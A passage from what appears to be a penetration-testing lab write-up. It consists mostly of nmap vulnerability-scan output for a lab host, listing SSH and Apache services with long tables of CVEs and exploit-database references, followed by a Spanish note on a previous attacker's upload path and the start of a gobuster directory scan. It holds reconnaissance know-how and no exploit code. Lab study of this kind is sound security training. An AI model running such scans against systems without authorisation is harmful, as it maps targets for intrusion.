| EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT*
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
| CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473
| 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 *EXPLOIT*
| PRION:CVE-2019-16905 4.4 https://vulners.com/prion/PRION:CVE-2019-16905
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| PRION:CVE-2019-6110 4.0 https://vulners.com/prion/PRION:CVE-2019-6110
| PRION:CVE-2019-6109 4.0 https://vulners.com/prion/PRION:CVE-2019-6109
| CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110
| CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109
| PRION:CVE-2018-20685 2.6 https://vulners.com/prion/PRION:CVE-2018-20685
| CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685
| PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
|_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT*
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.29:
| CVE-2019-9517 7.8 https://vulners.com/cve/CVE-2019-9517
| PACKETSTORM:176334 7.5 https://vulners.com/packetstorm/PACKETSTORM:176334 *EXPLOIT*
| PACKETSTORM:171631 7.5 https://vulners.com/packetstorm/PACKETSTORM:171631 *EXPLOIT*
| OSV:BIT-APACHE-2023-25690 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
| OSV:BIT-APACHE-2022-31813 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
| OSV:BIT-APACHE-2022-23943 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
| OSV:BIT-APACHE-2022-22720 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
| OSV:BIT-APACHE-2021-44790 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
| OSV:BIT-APACHE-2021-42013 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
| OSV:BIT-APACHE-2021-41773 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
| OSV:BIT-APACHE-2021-39275 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
| OSV:BIT-APACHE-2021-26691 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
| OSV:BIT-APACHE-2020-11984 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
| MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- 7.5 https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- *EXPLOIT*
| MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- 7.5 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- *EXPLOIT*
| F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 7.5 https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 *EXPLOIT*
| EDB-ID:50512 7.5 https://vulners.com/exploitdb/EDB-ID:50512 *EXPLOIT*
| EDB-ID:50446 7.5 https://vulners.com/exploitdb/EDB-ID:50446 *EXPLOIT*
| EDB-ID:50406 7.5 https://vulners.com/exploitdb/EDB-ID:50406 *EXPLOIT*
| E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 7.5 https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 *EXPLOIT*
| CVE-2023-25690 7.5 https://vulners.com/cve/CVE-2023-25690
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| CC15AE65-B697-525A-AF4B-38B1501CAB49 7.5 https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49 *EXPLOIT*
| 9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 7.5 https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 *EXPLOIT*
| 8713FD59-264B-5FD7-8429-3251AB5AB3B8 7.5 https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8 *EXPLOIT*
| 6A0A657E-8300-5312-99CE-E11F460B1DBF 7.5 https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF *EXPLOIT*
| 61075B23-F713-537A-9B84-7EB9B96CF228 7.5 https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228 *EXPLOIT*
| 5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 7.5 https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 *EXPLOIT*
| 5312D04F-9490-5472-84FA-86B3BBDC8928 7.5 https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928 *EXPLOIT*
| 52E13088-9643-5E81-B0A0-B7478BCF1F2C 7.5 https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C *EXPLOIT*
| 3F17CA20-788F-5C45-88B3-E12DB2979B7B 7.5 https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B *EXPLOIT*
| 22DCCD26-B68C-5905-BAC2-71D10DE3F123 7.5 https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123 *EXPLOIT*
| 2108729F-1E99-54EF-9A4B-47299FD89FF2 7.5 https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2 *EXPLOIT*
| 1337DAY-ID-39214 7.5 https://vulners.com/zdt/1337DAY-ID-39214 *EXPLOIT*
| 1337DAY-ID-38427 7.5 https://vulners.com/zdt/1337DAY-ID-38427 *EXPLOIT*
| 1337DAY-ID-37777 7.5 https://vulners.com/zdt/1337DAY-ID-37777 *EXPLOIT*
| 1337DAY-ID-36952 7.5 https://vulners.com/zdt/1337DAY-ID-36952 *EXPLOIT*
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB *EXPLOIT*
| EDB-ID:46676 7.2 https://vulners.com/exploitdb/EDB-ID:46676 *EXPLOIT*
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502 *EXPLOIT*
| OSV:BIT-APACHE-2021-40438 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2021-40438
| OSV:BIT-APACHE-2020-35452 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2020-35452
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C 6.8 https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C *EXPLOIT*
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 36618CA8-9316-59CA-B748-82F15F407C4F 6.8 https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| OSV:BIT-APACHE-2022-28615 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2022-28615
| OSV:BIT-APACHE-2021-44224 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2021-44224
| OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| OSV:BIT-APACHE-2022-22721 5.8 https://vulners.com/osv/OSV:BIT-APACHE-2022-22721
| OSV:BIT-APACHE-2020-1927 5.8 https://vulners.com/osv/OSV:BIT-APACHE-2020-1927
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577 *EXPLOIT*
| OSV:BIT-APACHE-2022-36760 5.1 https://vulners.com/osv/OSV:BIT-APACHE-2022-36760
| CVE-2022-36760 5.1 https://vulners.com/cve/CVE-2022-36760
| OSV:BIT-APACHE-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
| OSV:BIT-APACHE-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
| OSV:BIT-APACHE-2023-31122 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
| OSV:BIT-APACHE-2023-27522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-27522
| OSV:BIT-APACHE-2022-37436 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-37436
| OSV:BIT-APACHE-2022-30556 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30556
| OSV:BIT-APACHE-2022-30522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30522
| OSV:BIT-APACHE-2022-29404 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-29404
| OSV:BIT-APACHE-2022-28614 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28614
| OSV:BIT-APACHE-2022-28330 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28330
| OSV:BIT-APACHE-2022-26377 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-26377
| OSV:BIT-APACHE-2022-22719 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-22719
| OSV:BIT-APACHE-2021-41524 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-41524
| OSV:BIT-APACHE-2021-36160 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-36160
| OSV:BIT-APACHE-2021-34798 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-34798
| OSV:BIT-APACHE-2021-33193 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-33193
| OSV:BIT-APACHE-2021-31618 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
| OSV:BIT-APACHE-2021-30641 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-30641
| OSV:BIT-APACHE-2021-26690 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-26690
| OSV:BIT-APACHE-2020-9490 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-9490
| OSV:BIT-APACHE-2020-1934 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-1934
| OSV:BIT-APACHE-2020-13950 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-13950
| OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802
| OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622
| F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT*
| E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT*
| DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT*
| CVE-2023-31122 5.0 https://vulners.com/cve/CVE-2023-31122
| CVE-2022-37436 5.0 https://vulners.com/cve/CVE-2022-37436
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-17189 5.0 https://vulners.com/cve/CVE-2018-17189
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2018-1303 5.0 https://vulners.com/cve/CVE-2018-1303
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2006-20001 5.0 https://vulners.com/cve/CVE-2006-20001
| CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320
| CNVD-2023-80558 5.0 https://vulners.com/cnvd/CNVD-2023-80558
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT*
| BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT*
| B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT*
| A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT*
| 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT*
| 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT*
| 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT*
| OSV:BIT-APACHE-2020-11993 4.3 https://vulners.com/osv/OSV:BIT-APACHE-2020-11993
| FF610CB4-801A-5D1D-9AC9-ADFC287C8482 4.3 https://vulners.com/githubexploit/FF610CB4-801A-5D1D-9AC9-ADFC287C8482 *EXPLOIT*
| FDF4BBB1-979C-5320-95EA-9EC7EB064D72 4.3 https://vulners.com/githubexploit/FDF4BBB1-979C-5320-95EA-9EC7EB064D72 *EXPLOIT*
| FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 4.3 https://vulners.com/githubexploit/FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 *EXPLOIT*
| EDB-ID:50383 4.3 https://vulners.com/exploitdb/EDB-ID:50383 *EXPLOIT*
| E7B177F6-FA62-52FE-A108-4B8FC8112B7F 4.3 https://vulners.com/githubexploit/E7B177F6-FA62-52FE-A108-4B8FC8112B7F *EXPLOIT*
| E6B39247-8016-5007-B505-699F05FCA1B5 4.3 https://vulners.com/githubexploit/E6B39247-8016-5007-B505-699F05FCA1B5 *EXPLOIT*
| DBF996C3-DC2A-5859-B767-6B2FC38F2185 4.3 https://vulners.com/githubexploit/DBF996C3-DC2A-5859-B767-6B2FC38F2185 *EXPLOIT*
| D0E79214-C9E8-52BD-BC24-093970F5F34E 4.3 https://vulners.com/githubexploit/D0E79214-C9E8-52BD-BC24-093970F5F34E *EXPLOIT*
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2018-1302 4.3 https://vulners.com/cve/CVE-2018-1302
| CVE-2018-1301 4.3 https://vulners.com/cve/CVE-2018-1301
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
| CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE 4.3 https://vulners.com/githubexploit/CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE *EXPLOIT*
| CD48BD40-E52A-5A8B-AE27-B57C358BB0EE 4.3 https://vulners.com/githubexploit/CD48BD40-E52A-5A8B-AE27-B57C358BB0EE *EXPLOIT*
| C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 4.3 https://vulners.com/githubexploit/C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 *EXPLOIT*
| C8799CA3-C88C-5B39-B291-2895BE0D9133 4.3 https://vulners.com/githubexploit/C8799CA3-C88C-5B39-B291-2895BE0D9133 *EXPLOIT*
| C0380E16-C468-5540-A427-7FE34E7CF36B 4.3 https://vulners.com/githubexploit/C0380E16-C468-5540-A427-7FE34E7CF36B *EXPLOIT*
| BC027F41-02AD-5D71-A452-4DD62B0F1EE1 4.3 https://vulners.com/githubexploit/BC027F41-02AD-5D71-A452-4DD62B0F1EE1 *EXPLOIT*
| B946B2A1-2914-537A-BF26-94B48FC501B3 4.3 https://vulners.com/githubexploit/B946B2A1-2914-537A-BF26-94B48FC501B3 *EXPLOIT*
| B9151905-5395-5622-B789-E16B88F30C71 4.3 https://vulners.com/githubexploit/B9151905-5395-5622-B789-E16B88F30C71 *EXPLOIT*
| B58E6202-6D04-5CB0-8529-59713C0E13B8 4.3 https://vulners.com/githubexploit/B58E6202-6D04-5CB0-8529-59713C0E13B8 *EXPLOIT*
| B53D7077-1A2B-5640-9581-0196F6138301 4.3 https://vulners.com/githubexploit/B53D7077-1A2B-5640-9581-0196F6138301 *EXPLOIT*
| A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F 4.3 https://vulners.com/githubexploit/A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F *EXPLOIT*
| 9EE3F7E3-70E6-503E-9929-67FE3F3735A2 4.3 https://vulners.com/githubexploit/9EE3F7E3-70E6-503E-9929-67FE3F3735A2 *EXPLOIT*
| 9D511461-7D24-5402-8E2A-58364D6E758F 4.3 https://vulners.com/githubexploit/9D511461-7D24-5402-8E2A-58364D6E758F *EXPLOIT*
| 9CEA663C-6236-5F45-B207-A873B971F988 4.3 https://vulners.com/githubexploit/9CEA663C-6236-5F45-B207-A873B971F988 *EXPLOIT*
| 987C6FDB-3E70-5FF5-AB5B-D50065D27594 4.3 https://vulners.com/githubexploit/987C6FDB-3E70-5FF5-AB5B-D50065D27594 *EXPLOIT*
| 789B6112-E84C-566E-89A7-82CC108EFCD9 4.3 https://vulners.com/githubexploit/789B6112-E84C-566E-89A7-82CC108EFCD9 *EXPLOIT*
| 788F7DF8-01F3-5D13-9B3E-E4AA692153E6 4.3 https://vulners.com/githubexploit/788F7DF8-01F3-5D13-9B3E-E4AA692153E6 *EXPLOIT*
| 749F952B-3ACF-56B2-809D-D66E756BE839 4.3 https://vulners.com/githubexploit/749F952B-3ACF-56B2-809D-D66E756BE839 *EXPLOIT*
| 6E484197-456B-55DF-8D51-C2BB4925F45C 4.3 https://vulners.com/githubexploit/6E484197-456B-55DF-8D51-C2BB4925F45C *EXPLOIT*
| 68E78C64-D93A-5E8B-9DEA-4A8D826B474E 4.3 https://vulners.com/githubexploit/68E78C64-D93A-5E8B-9DEA-4A8D826B474E *EXPLOIT*
| 6758CFA9-271A-5E99-A590-E51F4E0C5046 4.3 https://vulners.com/githubexploit/6758CFA9-271A-5E99-A590-E51F4E0C5046 *EXPLOIT*
| 674BA200-C494-57E6-B1B4-1672DDA15D3C 4.3 https://vulners.com/githubexploit/674BA200-C494-57E6-B1B4-1672DDA15D3C *EXPLOIT*
| 5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 4.3 https://vulners.com/githubexploit/5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 *EXPLOIT*
| 4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F 4.3 https://vulners.com/githubexploit/4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F *EXPLOIT*
| 4C79D8E5-D595-5460-AA84-18D4CB93E8FC 4.3 https://vulners.com/githubexploit/4C79D8E5-D595-5460-AA84-18D4CB93E8FC *EXPLOIT*
| 4B44115D-85A3-5E62-B9A8-5F336C24673F 4.3 https://vulners.com/githubexploit/4B44115D-85A3-5E62-B9A8-5F336C24673F *EXPLOIT*
| 4013EC74-B3C1-5D95-938A-54197A58586D 4.3 https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D *EXPLOIT*
| 3CF66144-235E-5F7A-B889-113C11ABF150 4.3 https://vulners.com/githubexploit/3CF66144-235E-5F7A-B889-113C11ABF150 *EXPLOIT*
| 379FCF38-0B4A-52EC-BE3E-408A0467BF20 4.3 https://vulners.com/githubexploit/379FCF38-0B4A-52EC-BE3E-408A0467BF20 *EXPLOIT*
| 365CD0B0-D956-59D6-9500-965BF4017E2D 4.3 https://vulners.com/githubexploit/365CD0B0-D956-59D6-9500-965BF4017E2D *EXPLOIT*
| 2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F 4.3 https://vulners.com/githubexploit/2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F *EXPLOIT*
| 2B4FEB27-377B-557B-AE46-66D677D5DA1C 4.3 https://vulners.com/githubexploit/2B4FEB27-377B-557B-AE46-66D677D5DA1C *EXPLOIT*
| 1B75F2E2-5B30-58FA-98A4-501B91327D7F 4.3 https://vulners.com/githubexploit/1B75F2E2-5B30-58FA-98A4-501B91327D7F *EXPLOIT*
| 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
| 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575 *EXPLOIT*
| 1145F3D1-0ECB-55AA-B25D-A26892116505 4.3 https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505 *EXPLOIT*
| 108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 4.3 https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 *EXPLOIT*
| 0BC014D0-F944-5E78-B5FA-146A8E5D0F8A 4.3 https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A *EXPLOIT*
| 06076ECD-3FB7-53EC-8572-ABBB20029812 4.3 https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812 *EXPLOIT*
| 05403438-4985-5E78-A702-784E03F724D4 4.3 https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4 *EXPLOIT*
| 00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 4.3 https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 *EXPLOIT*
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
| CVE-2023-45802 2.6 https://vulners.com/cve/CVE-2023-45802
| OSV:BIT-APACHE-2020-13938 2.1 https://vulners.com/osv/OSV:BIT-APACHE-2020-13938
|_ PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT*
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /downloads/: Potentially interesting folder
|_ /img/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
2222/tcp open ssh OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| PRION:CVE-2020-15778 6.8 https://vulners.com/prion/PRION:CVE-2020-15778
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| PRION:CVE-2020-12062 5.0 https://vulners.com/prion/PRION:CVE-2020-12062
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| PRION:CVE-2021-41617 4.4 https://vulners.com/prion/PRION:CVE-2021-41617
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145
| PRION:CVE-2016-20012 4.3 https://vulners.com/prion/PRION:CVE-2016-20012
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
| PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
MAC Address: 02:16:E2:7D:0B:07 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/13%OT=22%CT=1%CU=36502%PV=Y%DS=1%DC=D%G=Y%M=0216E2%T
OS:M=65CB718D%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11N
OS:W7%O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F
OS:4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T
OS:=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R
OS:=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.62 seconds
---------------- GOBUSTER ------------------
VERIFICAMOS SI ESTABA LA RUTA QUE SUPUESTAMENTE TOMO EL ATACANTE ANTERIRORMENTE PARA SUBIR SU PAYLOAD Y NO ESTA /developmen/uploads/ SOLO ENCONTRAMOS ESTO:
┌──(root㉿kali)-[~]
└─# gobuster dir -u 10.10.217.114 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
